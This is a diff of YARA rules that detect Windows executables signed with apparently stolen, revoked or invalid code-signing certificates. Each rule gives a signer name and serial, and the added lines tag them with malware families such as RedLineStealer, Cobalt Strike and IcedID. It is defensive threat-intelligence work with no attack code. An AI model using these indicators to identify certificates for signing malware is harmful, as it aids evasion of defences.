-rule DITEKSHEN_INDICATOR_KB_CERT_105440F57E9D04419F5A3E72195110E6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_332Bd5801E8415585E72C87E0E2Ec71D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "44600134-156b-5762-bdae-f4c016f454a3"
+		id = "a4e1560f-12e4-5f49-a714-7df939dad513"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1400-L1411"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8056-L8069"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f8b7aebe91466a587dac366cf6483586f22f95ebc186aa139e55c6e52d276f63"
+		logic_hash = "ad3b1aebedd1ecef9af96da991cdbaca8033e0d48b5e7b776dd3fd3c4024928e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e95c7b4f2e5f64b388e968d0763da67014eb3aeb8c04bd44333ca3e151aa78c2"
+		thumbprint = "47338c1a0ea425c47dede188d10ca95288514f369fe8a5105752bd8d906b8cbc"
+		reason = "NetSupport"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CRYPTOLAYER SRL" and pe.signatures [ i ] . serial == "10:54:40:f5:7e:9d:04:41:9f:5a:3e:72:19:51:10:e6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Marketing Strategies, Inc." and pe.signatures [ i ] . serial == "33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_C01E41Ff29078E6626A640C5A19A8D80 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0139Dde119Bb320Dfb9F5Defe3F71245 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "93ee927f-71bd-5490-8f70-5486ee9c3b79"
+		id = "4962ea0c-ce99-57d3-8848-48dcaab4f346"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1413-L1424"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8071-L8084"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ee6f365d46fb1ee0e448fc0ab9d07c51a46f6ee95155094ec956f1cad6c1052"
+		logic_hash = "b2a7154d73eb9271a181d71d65c73e399bb2f7d1fe031240e94b6ef4c4f7cb18"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cca4a461592e6adff4e0a4458ebe29ee4de5f04c638dbd3b7ee30f3519cfd7e5"
+		thumbprint = "23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645"
+		reason = "RedLineStealer"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BurnAware" and pe.signatures [ i ] . serial == "c0:1e:41:ff:29:07:8e:66:26:a6:40:c5:a1:9a:8d:80" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hangil IT Co., Ltd" and pe.signatures [ i ] . serial == "01:39:dd:e1:19:bb:32:0d:fb:9f:5d:ef:e3:f7:12:45" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fa3Dcac19B884B44Ef4F81541184D6B0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a188e033-4381-5ff0-8f54-f36571ae7097"
+		id = "a905ee22-94c6-5d16-a9a4-a1c1528e4ac2"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1426-L1437"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8086-L8099"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7e9e2b22f6f2cfd5d7c962fb43c85d703d0a600f954f614073c708f4b881d90e"
+		logic_hash = "94a5721bd3089f46699a947afcd03287712f94754666809e6495b01fc9cd6dcf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6557117e37296d7fdcac23f20b57e3d52cabdb8e5aa24d3b78536379d57845be"
+		thumbprint = "f13e4801e13898e839183e3305e1dda7f4c0ebf6eaf7553e18c1ddd4edc94470"
+		reason = "Gozi"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unicom Ltd" and pe.signatures [ i ] . serial == "00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and pe.signatures [ i ] . serial == "2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_70E1Ebd170Db8102D8C28E58392E5632 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_626735Ed30E50E3E0553986D806Bfc54 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f5ccfbdd-d72d-5060-84e6-0ab8477f73fe"
+		id = "5cab852e-8483-5c38-a396-3a53cf64450a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1439-L1450"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8101-L8114"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b639424c97fb1da440c458cf5cb8f04562292284db7b576c0676a632704f597b"
+		logic_hash = "960005fe1a28ddb50261aeaaa850a2410ac03ee9709af2a75485313676c92c53"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "90d67006be03f2254e1da76d4ea7dc24372c4f30b652857890f9d9a391e9279c"
+		thumbprint = "a1488004ec967faf6c66f55440bbde0de47065490f7c758f3ca1315bb0ef3b97"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Equal Cash Technologies Limited" and pe.signatures [ i ] . serial == "70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures [ i ] . serial == "62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6Cfa5050C819C4Acbb8Fa75979688Dff : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4A2E337Fff23E5B2A1321Ffde56D1759 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "35673979-5578-5d32-b8f9-9e74f0c336a2"
+		id = "60d218b2-5297-59e6-9370-fc0ba036c688"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1452-L1463"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8116-L8129"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e5978deb84a0c6cee9132f8806f239f33478462da31a423a04922c195cbd343a"
+		logic_hash = "524048d39de89002efbb8bf75135551b300e03f1126e5e117a4682c79ec04c9a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e7241394097402bf9e32c87cada4ba5e0d1e9923f028683713c2f339f6f59fa9"
+		thumbprint = "67099e0c41c102535d388fab1de576433f2ded2b08fb7da1bf66e3bdaba4eeb4"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Web Development Ltd." and pe.signatures [ i ] . serial == "6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karolina Klimowska" and pe.signatures [ i ] . serial == "4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B8164F7143E1A313003Ab0C834562F1F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_967Cb0898680D1C174B2Baae5Fa332Db : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d6ebdfb9-55db-58e2-89a8-d47d747e3432"
+		id = "a95f7912-89fc-5c80-96ab-19e6ee2ccafd"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1465-L1476"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8131-L8144"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77f8f125740de97e6fdd98103eefa2a431df0cbe2e7de44f7e863e22ebcfea4c"
+		logic_hash = "8c68127b29d1a1aa4c1e2033c809fa57466f224c2bb4ede0ffb2b572a3d58c0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "263c636c5de68f0cd2adf31b7aebc18a5e00fc47a5e2124e2a5613b9a0247c1e"
+		thumbprint = "c231f1e6cc3aec983d892e1bc3bb1815335fb24e3e2f611d79bade9a07cbd819"
+		reason = "Babadeda"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ekitai Data Inc." and pe.signatures [ i ] . serial == "00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "James Caulfield" and pe.signatures [ i ] . serial == "96:7c:b0:89:86:80:d1:c1:74:b2:ba:ae:5f:a3:32:db" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_E3C7Cc0950152E9Ceead4304D01F6C89 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_890570B6B0E2868A53Be3F8F904A88Ee : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8bea34fa-3620-5f5f-895f-3baa3b7b458a"
+		id = "8d619117-00cb-5276-87c1-3f6cd701218d"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1478-L1489"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8146-L8159"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "395ed4c9c8668f6416632f85883c5fd5b6038ce8388410f22bcbe2a9e6281c35"
+		logic_hash = "952b211cc2c7988b9a09ca5a96c44fea24bbaced28a79ab0ae6732675fda7365"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "82975e3e21e8fd37bb723de6fdb6e18df9d0e55f0067cc77dd571a52025c6724"
+		thumbprint = "f291d21d72dcefc369526a97b7d39214544b22057757ac00907ab4ff3baa2edd"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DNS KOMPLEKT" and pe.signatures [ i ] . serial == "e3:c7:cc:09:50:15:2e:9c:ee:ad:43:04:d0:1f:6c:89" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JESEN LESS d.o.o." and pe.signatures [ i ] . serial == "89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6A241Ffe96A6349Df608D22C02942268 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7D27332C3Cb3A382A4Fd232C5C66A2 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "571f5f11-576a-511b-975d-0643ae834502"
+		id = "d9f0d30b-ac9d-57f9-8220-c6a376fe68db"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1491-L1502"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8161-L8174"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "41db1a9b11e2d5b8de5ba81496d0e76ea5eddacc01c77bc28c7e05496842df04"
+		logic_hash = "d21218469ae41def8eed3d2cff38744ae928d9e8fed8ff68c539d33193136e0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f97f4b9953124091a5053712b2c22b845b587cb2655156dcafed202fa7ceeeb1"
+		thumbprint = "935af7361c09f45dcf3fa6e4f4fd176913c47673104272259b40de55566cabed"
+		reason = "Silence"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HELP, d.o.o." and pe.signatures [ i ] . serial == "6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures [ i ] . serial == "7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C04F5D17Af872Cb2C37E3367Fe761D0D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_40F5660A90301E7A8A8C3B42 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9d008f04-8d02-5c6b-b38d-234409cce277"
+		id = "c3c8fbdf-49ca-5898-b267-74256154973a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1504-L1518"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8176-L8189"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7fa0d16600ae89e41d7b2b0655b142ea36202e8bbbf5f8e25cbb45a005995e79"
+		logic_hash = "ed584aa8ad833066ed9f7ddbf98dc75efe88e0b7e69f564a90eade63dc2aee2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7f52ece50576fcc7d66e028ecec89d3faedeeedb953935e215aac4215c9f4d63"
+		thumbprint = "2ac041e3c46c82fbcee34617ee31336e845e18efe6b9ae5c8811351db5b56da2"
+		reason = "Cobalt Strike"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DES SP Z O O" and ( pe.signatures [ i ] . serial == "00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures [ i ] . serial == "c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Booz Allen Hamilton Inc." and pe.signatures [ i ] . serial == "40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Dfc1F1B0F205Cc17Ed7D216Bb991F859 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e6bd4476-d287-54d9-82b3-d80f328d7831"
+		id = "93d5fd87-af92-5449-9d02-4666afa38fff"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1520-L1531"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8191-L8204"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0c804e7f1e43a98b150a97adcbba882f7764000abdf7c7408e3361aefa9298b5"
+		logic_hash = "24783267ab27f8102f724810322a7fbb010b7a2abf59ad206b96a3eb75968907"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f91d436c1c7084b83007f032ef48fecda382ff8b81320212adb81e462976ad5a"
+		thumbprint = "b577362c1abcfb7d163b8702f23a6a3643c72ea0a3c8cf262092903a3110fa04"
+		reason = "PrivateLoader"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cubic Information Systems, UAB" and pe.signatures [ i ] . serial == "5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Astori LLC" and pe.signatures [ i ] . serial == "df:c1:f1:b0:f2:05:cc:17:ed:7d:21:6b:b9:91:f8:59" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_E573D9C8B403C41Bd59Ffa0A8Efd4168 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f77ccdb6-77b6-5c47-bde6-2b1b449f9533"
+		id = "683ea9a6-2002-5c48-8512-51f65e70dd2c"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1533-L1544"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8206-L8219"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc8073ebb9847d642f15cc74859b643afe00b3c331f68c06f3ff62c037225201"
+		logic_hash = "ec53ab007d8be2f3cad45e787e724c5af0dd3f18c2b66a179b822bdeeb0d1560"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "59fe580974e2f813c2a00b4be01acd46c94fdea89a3049433cd5ba5a2d96666d"
+		thumbprint = "a9ab2be0ea677c6c6ed67b23cfee0fa44bfb346a4bb720f10a3f02a78b8f5c82"
+		reason = "Dridex"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOREC, OOO" and pe.signatures [ i ] . serial == "71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VERONIKA 2\" OOO\"" and pe.signatures [ i ] . serial == "e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B2E730B0526F36Faf7D093D48D6D9997 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2F38De4Ced0B070973B9E9B9B1Dcfa7F : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7c74d3aa-dc4f-51ed-9574-74e0539cd22b"
+		id = "39910712-4a11-5722-9b48-c069bfcefb14"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1546-L1557"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8221-L8234"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "16c50b7a2b7b55662d5cdb2261a6b352657b2689a9328916fcf63ddfbef5d08f"
+		logic_hash = "84c3d89e8393bcaddea53326730d795f482ec65c574fde5c1c81f395178b591a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "10dd41eb9225b615e6e4f1dce6690bd2c8d055f07d4238db902f3263e62a04a9"
+		thumbprint = "71382f6c6e48df51f15606380cd6948bf37f044d18566ebc2d262fc87e70b9b1"
+		reason = "Gh0stRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bamboo Connect s.r.o." and pe.signatures [ i ] . serial == "00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fahad Malik" and pe.signatures [ i ] . serial == "2f:38:de:4c:ed:0b:07:09:73:b9:e9:b9:b1:dc:fa:7f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2C90Eaf4De3Afc03Ba924C719435C2A3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_53E1F226Cb77574F8Fbeb5682Da091Bb : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0b1ae208-bf81-55d0-b4e5-b1c1f7556387"
+		id = "6967042e-156b-541d-970c-491dece12f08"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1559-L1570"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8236-L8249"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "792898b34ebe4dfc603b3f3b54777a86827a52fd3699a799e95c436317be77da"
+		logic_hash = "41f4902e9d02254efdfd19a73de16e1128b15d264c3ed128d5ec28bd92f2d8a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6b916111ffbd6736afa569d7d940ada544daf3b18213a0da3025b20973a577dc"
+		thumbprint = "d247ec7e224a24683da3f138112ffc9607f83c917d6c45494dd744d732249260"
+		reason = "SystemBC"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AntiFIX s.r.o." and pe.signatures [ i ] . serial == "2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OdyLab Inc" and pe.signatures [ i ] . serial == "53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Df2547B2Cab5689A81D61De80Eaaa3A2 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9c91e39e-a120-537d-a24c-f0b8ffe9dd6e"
+		id = "4eba17f8-df3c-552d-90b5-faef7b860203"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1572-L1583"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8251-L8264"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "90c695b0cffd4786471faca21b77161ae6e930540766c4f18796a7adea74b6f5"
+		logic_hash = "c32a6510bd3cfd09e84ccf36140eb405945059c981fb1888298501493f6ef68f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a3b0a1cd3998688f294838758688f96adee7d5aa98ec43709b8868d6914e96c1"
+		thumbprint = "4c6e21a6e96ea6fae6c142c2d1c919f590d9bf4e5c6b0f3ec7f9b0a38f3ce45d"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALM4U GmbH" and pe.signatures [ i ] . serial == "00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" )
